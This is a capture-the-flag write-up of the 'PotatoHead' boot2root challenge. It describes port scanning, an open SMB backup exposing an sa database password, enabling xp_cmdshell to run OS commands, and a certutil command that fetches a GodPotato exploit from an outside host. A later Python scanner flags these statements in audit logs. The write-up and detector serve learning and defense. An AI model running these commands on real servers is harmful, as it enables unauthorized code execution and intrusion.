Equinor CTF | PotatoHead

So after a very long hiatus from pentesting and CTFs, I joined a team of friends and colleagues once again for the Equinor CTF. The first challenge I took on was a boot2root challenge, since I figured I might as well jump right back into the deep end.

Enumeration

Ports

I started as usual with an nmap scan of the target machine.

Nmap scan report for ip-10-128-8-167.eu-west-1.compute.internal (10.128.8.167)
Host is up (0.032s latency).
Not shown: 993 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1433/tcp open  ms-sql-s
3389/tcp open  ms-wbt-server
5985/tcp open  wsman

I had a look at the website but it didn't seem to contain anything useful. Whilst I ran a gobuster scan in the background just in case, I decided to check out the SMB shares.

I was able to find a share called 'Backup' that was not password protected and which contained an entire backup of the website that was hosted on port 80.

Inside the application.json file I found some very interesting information, especially after also noticing that there was a SQL Server port open on the target.

{
  "ConnectionStrings": {
    "DefaultConnection": "Server=localhost;Database=BeachClubDb;User Id=sa;Password=RLFXT0PpAtk2IAyB1xKnuaFaqDX;TrustServerCertificate=True;"
  },
  "Logging": {
    "LogLevel": {
      "Default": "Information",
      "Microsoft.AspNetCore": "Warning"
    }
  },
  "AllowedHosts": "*"
}

SQL Server

I used these credentials to connect to the SQL Server from my MacBook using a program called DBeaver. After having a look around in the BeachClubDb database tables, I determined there was nothing of use there, so I instead started trying to gain information via xp_cmdshell commands.

User Flag

The following SQL commands were enough to read the contents of the user flag found in C:\Users\Public\flag.txt.

-- Expose the advanced options so that xp_cmdshell becomes configurable
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
-- Turn on xp_cmdshell (it is disabled by default)
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Run an OS command under the SQL Server service account
EXEC xp_cmdshell 'type C:\Users\Public\flag.txt';

This displayed the contents of the file and I was able to gain the user-level flag.

EPT{sei_sandnes_e_stabilt!}

Privilege Escalation

I spent another hour or so trying to find a way to escalate my privileges to root. I noticed through running the whoami /priv command that I had the following privileges.

SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Having SeImpersonatePrivilege enabled was interesting to me, and it sent me down a rabbit-hole of trying to get a process to runAs the LocalSystem user. All attempts at this ended up being futile. The few times I was able to download an .exe file to the system, it was quickly swept up by the running anti-virus.

EXEC xp_cmdshell 'certutil -urlcache -split -f http://10.128.8.170:8000/GodPotato.exe C:\temp\gp.exe';
EXEC xp_cmdshell 'dir C:\temp\';

After a few seconds my gp.exe file would disappear. I'm convinced I was on the right path, given that the task was called 'PotatoHead', but I eventually decided I was spending too much time on this task and should try something else instead.
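As an added defensive example, not code from the original write-up: a small Python scanner that flags, in constructed SQL Server audit records, the xp_cmdshell enablement sequence shown under User Flag and the xp_cmdshell-driven download attempt from this section. The pipe-delimited record format, the sample entries and the rule names are assumptions for the example.

```python
import re
from dataclasses import dataclass

# Constructed audit records in the shape "<timestamp>|<login>|<statement>", one
# statement per line; the statements mirror the write-up's own command sequence.
SAMPLE_AUDIT = r"""
2023-11-04T10:01:12Z|sa|EXEC sp_configure 'show advanced options', 1;
2023-11-04T10:01:13Z|sa|RECONFIGURE;
2023-11-04T10:01:15Z|sa|EXEC sp_configure 'xp_cmdshell', 1;
2023-11-04T10:01:16Z|sa|RECONFIGURE;
2023-11-04T10:02:40Z|sa|EXEC xp_cmdshell 'type C:\Users\Public\flag.txt';
2023-11-04T10:15:02Z|sa|EXEC xp_cmdshell 'certutil -urlcache -split -f http://10.128.8.170:8000/GodPotato.exe C:\temp\gp.exe';
2023-11-04T10:20:00Z|webapp|SELECT TOP 10 * FROM Members;
"""

# Enabling xp_cmdshell via sp_configure, and any xp_cmdshell call with its OS command.
ENABLE_RE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1\b", re.I)
EXEC_RE = re.compile(r"\bxp_cmdshell\s+'(?P<cmd>[^']*)'", re.I)
# Common Windows download one-liners; certutil -urlcache is the one used in the write-up.
DOWNLOAD_RE = re.compile(r"certutil(\.exe)?\s.*-urlcache|bitsadmin|Invoke-WebRequest|\bcurl\s|\bwget\s", re.I)

@dataclass
class Finding:
    timestamp: str
    login: str
    rule: str      # xp_cmdshell_enabled | xp_cmdshell_exec | xp_cmdshell_download
    detail: str    # the statement, or the OS command it ran

def classify(statement: str):
    """Return (rule, detail) for a statement worth alerting on, else None."""
    if ENABLE_RE.search(statement):
        return "xp_cmdshell_enabled", statement.strip()
    m = EXEC_RE.search(statement)
    if m:
        cmd = m.group("cmd")
        rule = "xp_cmdshell_download" if DOWNLOAD_RE.search(cmd) else "xp_cmdshell_exec"
        return rule, cmd
    return None

def scan_audit(text: str) -> list:
    """Scan pipe-delimited audit records and return findings in log order."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        timestamp, login, statement = line.split("|", 2)
        hit = classify(statement)
        if hit:
            findings.append(Finding(timestamp, login, *hit))
    return findings
```

Any hit on the sa login is itself worth a second look: the application only needed a low-privilege database user, so sa appearing in audit records outside maintenance windows is a signal in its own right.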

Summary

It was fun to get back into doing boot2root style challenges, and I was glad to get the user flag at least. I eagerly await finding out how close I was to privilege escalation with the methods I was trying. After having done this write-up I have now noticed there was an RDP port open on the server which I didn't investigate further after finding the Database credentials. Perhaps I should have tried that instead.

Either way it was good fun as always to participate in the CTF with my friends and colleagues and I'm proud of how well we did, for being just a team of 4, coming 32nd overall and 23rd in our division, out of over 100 teams.